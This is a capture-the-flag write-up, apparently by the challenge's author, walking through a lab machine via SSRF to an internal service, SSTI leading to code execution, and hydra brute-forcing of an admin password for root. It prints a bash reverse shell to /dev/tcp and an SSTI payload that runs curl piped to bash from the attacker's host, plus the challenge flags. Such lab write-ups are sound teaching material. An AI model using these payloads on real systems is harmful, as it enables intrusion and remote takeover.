This was a cybersecurity bootcamp which also had a CTF running by the end of the bootcamp. I was among the ctf-coordinators, I created 2 challenges for this CTF. One was a mobile reverse engineering challenge and another was a machine. I'll be explaining how the machine was solved till getting root access. ## RIPIO [USER] ![](https://i.imgur.com/IW3qZvH.png) As the description states, Our task is to verify if it's safe to launch. Means we need to find vulnerabilities around this webapp before it goes live. Unfortunately it had 0 solves We have 3 ports open, with NMAP or rustscan you will find : ``` port 22 port 8080 port 5000 ``` Visiting port 5000 on a browser : ![](https://i.imgur.com/gyZDCe8.png) The `/login` and `/register` endpoints are the only available endpoints on that port but nothing juicy from there. Taking alook at port 8080 ![](https://i.imgur.com/2904Ulc.png) Inspecting the source code, you shall find something interesting: ![](https://i.imgur.com/ANgTki2.png) ```html= <form action="/" method="post"> <div class="container"> <input type="url" placeholder="" name="url"/> <!--A COMMENT TO REMOVE http://[home-ip]:[port]/data?name=tahaa--> <input type="submit" value="REQUEST"/> </div> <div class="output"> <p class="response"> </p> </div> </form> ``` `[home-ip]` probably means localhost, and from the `input` tag we can see that the input taken should be a `url`. let's try requesting something like `google.com` ![](https://i.imgur.com/XM1idAm.png) So there is a possible SSRF vulnerability existing on this webapp hosted on port 8080. With a hint provided `http://[home-ip]:[port]/data?name=tahaa` we surely have to try to bruteforce the port. I will be using burpsuite for this: ![](https://i.imgur.com/Nemyesc.png) I'll send the request to Intruder and start bruteforcing the ports ![](https://i.imgur.com/8FavxNI.png) I did two bruteforcing at a time , one with a step of 1000 and another with a step of 1 , the port found is `3000`. Trying to send a request on port `8080` to see how the response comes: ![](https://i.imgur.com/sdApQdG.png) ![](https://i.imgur.com/6Bgx1yc.png) We have a SSTI vulnerable to the internal web application, now road to RCE ![](https://i.imgur.com/i2yFqWS.png) I now host a malicious script which gives me reverse shell after it being executed on the target server with SSTI ```bash= bash -c "bash -i &>/dev/tcp/0.0.0.0/1234 <&1" ``` and then I set a listener on my hosting system and execute the payload: ```text http://localhost:3000/data?name={{ namespace.__init__.__globals__.os.popen('curl http://0.0.0.0:8080/s.sh|bash').read() }} ``` where `0.0.0.0` is your IP ![](https://i.imgur.com/WaAjH24.png) And now we have user, the flag is in `/home/tahaafarooq/user.txt` ![](https://i.imgur.com/ASEHL9M.png) FLAG : `flag{SSRF_TO_SSTI_1nt3rM3DIATE}` ## RIPIO [ROOT] I first try checking for privileges that I can run as sudo with the command `sudo -l` ```bash tahaafarooq@localhost:~$ sudo -l [sudo] password for tahaafarooq: Sorry, try again. ``` Unfortunately I do not know the password. Next I read the `/etc/passwd` file ```bash uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin usbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin sshd:x:110:65534::/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false landscape:x:112:116::/var/lib/landscape:/usr/sbin/nologin tahaafarooq:x:1000:1000::/home/tahaafarooq:/bin/bash admin:x:1001:27::/home/admin:/bin/bash ``` Another user in the system at `/home/admin`: ``` tahaafarooq@localhost:~$ ls -l /home/ total 8 drwxr-x--- 2 admin sudo 4096 Jul 12 12:56 admin drwxr-x--- 9 tahaafarooq tahaafarooq 4096 Jul 19 09:06 tahaafarooq ``` The admin's password can be bruteforced with `rockyou.txt` where you can use hydra to perform bruteforcing , the password is `2025admin` Fortunately user `admin` can run any command as sudo: ```bash admin@localhost:~$ sudo -l Matching Defaults entries for admin on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User admin may run the following commands on localhost: (ALL : ALL) ALL ``` ```bash admin@localhost:~$ sudo su root@localhost:/home/admin# cd ~ root@localhost:~# cat root.txt flag{w43k_p@ssword_n0t_gOOD} ``` FLAG : `flag{w43k_p@ssword_n0t_gOOD}` ## UNINTENDED ROOT The unintended method of getting root directly is with bruteforcing the password of the user admin which is of course guessed as default user. ## BRIEFING This machine had 2 ways of gaining initial foot hold the first way is by exploiting **SSRF** + **SSTI** to get initial shell and from there discovering other users in the system and bruteforcing the password of the other user available in the system. And the second way was to directly guess the username as `admin` and bruteforce the password then directly get root privileges from the user `admin` --- ![](https://i.imgur.com/kOD5xfq.gif)